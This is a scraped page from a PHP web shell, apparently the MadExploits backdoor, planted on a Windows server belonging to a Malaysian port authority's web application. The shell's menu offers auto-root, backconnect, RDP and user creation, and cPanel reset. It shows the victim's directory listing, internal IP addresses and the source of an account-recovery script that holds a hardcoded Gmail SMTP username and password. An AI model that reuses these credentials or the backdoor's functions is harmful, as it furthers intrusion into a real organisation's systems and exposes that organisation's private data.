Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens_220424 /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
edg
[ DIR ]
drwxrwxrwx
edg_200430
[ DIR ]
drwxrwxrwx
edg_20200630
[ DIR ]
drwxrwxrwx
edg_o
[ DIR ]
drwxrwxrwx
edg_old
[ DIR ]
drwxrwxrwx
extension
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
inc
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
kod
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
utility
[ DIR ]
drwxrwxrwx
!test.php
17
B
-rw-rw-rw-
Nota14102020.docx
22.8
KB
-rw-rw-rw-
access.php
253
B
-rw-rw-rw-
access2.php
245
B
-rw-rw-rw-
account_recovery.php
6.56
KB
-rw-rw-rw-
ajax.php
2.43
KB
-rw-rw-rw-
custom.css
3.35
KB
-rw-rw-rw-
custom.js
7.03
KB
-rw-rw-rw-
custom200630.js
6.46
KB
-rw-rw-rw-
custom_200630.css
1.04
KB
-rw-rw-rw-
custom_200705.js
6.82
KB
-rw-rw-rw-
custom_210125.css
2.22
KB
-rw-rw-rw-
dashboard.php
21.63
KB
-rw-rw-rw-
dashboard_old.php
51
B
-rw-rw-rw-
dglist.php
3.97
KB
-rw-rw-rw-
err_404.php
75
B
-rw-rw-rw-
index.php
2.49
KB
-rw-rw-rw-
licenses.php
103
B
-rw-rw-rw-
login.php
9.8
KB
-rw-rw-rw-
login_o.php
9.81
KB
-rw-rw-rw-
main.php
584
B
-rw-rw-rw-
microsoft.php
214.77
KB
-rw-rw-rw-
odbc.php
12.43
KB
-rw-rw-rw-
odbc_212801.php
12.77
KB
-rw-rw-rw-
recover_msg.php
806
B
-rw-rw-rw-
reset_password.php
8.84
KB
-rw-rw-rw-
sessions.php
2.04
KB
-rw-rw-rw-
sessions_200705.php
1.4
KB
-rw-rw-rw-
sessions_200721.php
1.75
KB
-rw-rw-rw-
test_sess.php
1.35
KB
-rw-rw-rw-
testinput.php
6.7
KB
-rw-rw-rw-
~$ta14102020.docx
162
B
-rw-rw-rw-
~WRL0738.tmp
23.29
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : account_recovery.php
<?php if(empty($page)){ include("access2.php"); } ?> <?php include 'inc/config.php'; ?> <?php include 'inc/template_start.php'; ?> <?php include 'inc/template_scripts.php'; ?> <script type="text/javascript"> $(document).ready(function(){ $.testme = function(x,y){ var typ = ''; if(x == '1') typ = "success"; else if(x == '2') typ = "warning"; else typ = "danger"; $.bootstrapGrowl('<h4><strong>Notification</strong></h4> <p>'+y+'</p>', { type: typ, delay: 3000, allow_dismiss: true, offset: {from: 'top', amount: 20} }); }; }); </script> <?php growl_me($_SESSION,$g_success); require 'extension/PHPMailer-master/src/Exception.php'; require 'extension/PHPMailer-master/src/PHPMailer.php'; require 'extension/PHPMailer-master/src/SMTP.php'; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\SMTP; $success = 0; if($_POST): $email = $_POST['user-email']; $mail = new PHPMailer(true); $sql = "SELECT a.* FROM user_list a WHERE 1 AND emailUser = ?"; $param_data = array( "emailUser" => $email ); $data = mysqli_prepare_all($sql,$param_type = "auto",$param_data); if(empty($data->fetch_assoc())) goto skipsend; try { ob_start(); $token = md5($email.date("dmyh:i:s")); $stmt = $mysqli->stmt_init(); $stmt->prepare("UPDATE user_list SET recovery_token = ?, recovery_exp = ADDTIME(NOW(), '00:30:00') WHERE emailUser = ?"); $stmt->bind_param("ss",$token,$email); $stmt->execute(); $stmt->close(); include('recover_msg.php'); $fileValue = ob_get_contents(); ob_end_clean(); //Server settings // $mail->SMTPDebug = SMTP::DEBUG_SERVER; // Enable verbose debug output $mail->isSMTP(); // Send using SMTP $mail->Host = 'smtp.gmail.com'; // Set the SMTP server to send through $mail->SMTPAuth = true; // Enable SMTP authentication $mail->Username = 'edgpens.sender@gmail.com'; // SMTP username $mail->Password = 'teka.teki'; // SMTP password $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; // Enable TLS encryption; `PHPMailer::ENCRYPTION_SMTPS` encouraged $mail->Port = 587; // TCP port to connect to, use 465 for `PHPMailer::ENCRYPTION_SMTPS` above //Recipients $mail->setFrom('edgpens.sender@gmail.com', 'eDGPENS LPKmn Automail'); // $mail->addAddress('joe@example.net', 'Joe User'); // Add a recipient $mail->addAddress($email); // Name is optional // $mail->addReplyTo('info@example.com', 'Information'); // $mail->addCC('cc@example.com'); // $mail->addBCC('bcc@example.com'); // Attachments // $mail->addAttachment('/var/tmp/file.tar.gz'); // Add attachments // $mail->addAttachment('/tmp/image.jpg', 'new.jpg'); // Optional name // Content $mail->isHTML(true); // Set email format to HTML $mail->Subject = 'Account Recovery'; $mail->Body = $fileValue; $mail->AltBody = 'This is the body in plain text for non-HTML mail clients'; $mail->send(); echo 'Message has been sent'; } catch (Exception $e) { // echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } // include "recover_msg.php"; // exit(); skipsend: $_SESSION['success'] = 1; $_SESSION['success_msg'] = "Account recovery email has been sent."; echo "<script>window.location.replace('index.php?page=account_recovery&success=1');</script>"; exit(); endif; // if() ?> <div id="page-content"> <div class="row"> <div class="col-sm-12"> <div class="widget-image widget-image-xs"> <img src="img/lpkmn/bg.jpg" alt="image"> <div class="widget-image-content"> <div class="pull-right text-light-op"> <strong> <form id="form-login" method="post" action="login.php" class="form-inline"> <div class="form-group"> <div class="row"> <div class="col-md-12"> <input type="text" id="login-user" name="login-user" class="form-control" placeholder="Your email.."> <!-- <div style="display: block;position:absolute;right:18px;margin: 2px"><i><u>New Register</u></i></div> --> </div> </div> </div> <div class="form-group"> <div class="row"> <div class="col-md-12"> <input type="password" id="login-password" name="login-password" class="form-control" placeholder="Your password.."> <div style="display: block;position:absolute;right:18px;margin: 2px"><i><a style="cursor: pointer;color: #CCC" href="index.php?page=account_recovery">Forgot Password</a></i></div> </div> </div> </div> <div class="form-group form-actions"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary"><i class="fa fa-unlock-alt"></i> Login</button> </div> </form> </strong> </div> <h2 class="widget-heading text-light"><strong>eDGPENS LPKMn</strong></h2> <h3 class="widget-heading text-light-op">Lembaga Pelabuhan Kemaman</h3> </div> </div> </div> </div> <!-- Login Container --> <div id="login-container" style="position: relative;top:20px"> <!-- Login Block --> <div class="row"> <div class="col-md-12"> <div class="block animation-fadeInQuickInv"> <!-- Login Title --> <div class="block-title"> <h2>Account Recovery</h2> </div> <!-- END Login Title --> <!-- Login Form --> <form id="form-login" method="post" class="form-bordered"> <div class="form-group"> <label for="example-nf-email">Email</label> <input type="email" id="user-email" name="user-email" required class="form-control"> <span class="help-block">Please enter your email</span> </div> <div class="form-group form-actions"> <button type="submit" class="btn btn-effect-ripple btn-sm btn-primary btn-block"><i class="fa fa-check"></i> Send Recovery Password</button> </div> </form> <!-- END Login Form --> </div> <!-- END Login Block --> <!-- Footer --> <footer class="text-muted text-center animation-pullUp"> <small><span id="year-copy"></span> © <a href="login.php" target="_self"><?php echo $template['name'] . ' ' . $template['version']; ?></a></small> </footer> <!-- END Footer --> </div></div> </div> </div> <!-- END Login Container --> <?php // include 'inc/template_scripts.php'; ?> <!-- Load and execute javascript code used only in this page --> <script src="js/pages/readyLogin.js"></script> <script>$(function(){ ReadyLogin.init(); });</script> <?php include 'inc/template_end.php'; ?>
Close